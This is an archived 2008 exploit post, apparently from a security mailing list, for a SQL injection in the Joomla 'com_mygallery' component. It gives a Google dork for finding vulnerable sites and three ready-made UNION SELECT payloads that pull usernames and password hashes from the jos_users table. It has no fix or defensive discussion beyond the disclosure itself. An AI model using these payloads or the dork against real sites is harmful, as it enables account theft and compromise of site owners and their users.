Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

joomla SQL Injection(com_cms )

joomla SQL Injection(com_aso rtyment)katid

XOOPS Module prayerlist SQL Injection(cid)

joomla SQL Injection(com_mos t)secid

From:	hackturkiye.hackturkiye_(at)_gmail.com <hackturkiye.hackturkiye_(at)_gmail.com>
Date:	22.02.2008
Subject:	joomla SQL Injection(com_mygallery)

###############################################################
#
#   joomla SQL Injection(com_mygallery)
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MAİL : hackturkiye.hackturkiye@gmail.com
#        
################################################################
#
#  DORK 1 : allinurl:"com_mygallery"cid
#
#  DORK 2 : allinurl:
#
################################################################
  EXPLOIT :

-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,
6,7,8,9,10,11,12,13,14/**/from/**/jos_users/*

-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,
6,7,8,9,10,11/**/from/**/jos_users/*

-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,
6,7,8,9,10,11,12,concat(username,0x3a,password),concat(username,0x3a,
password),15/**/from/**/jos_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN
################################################################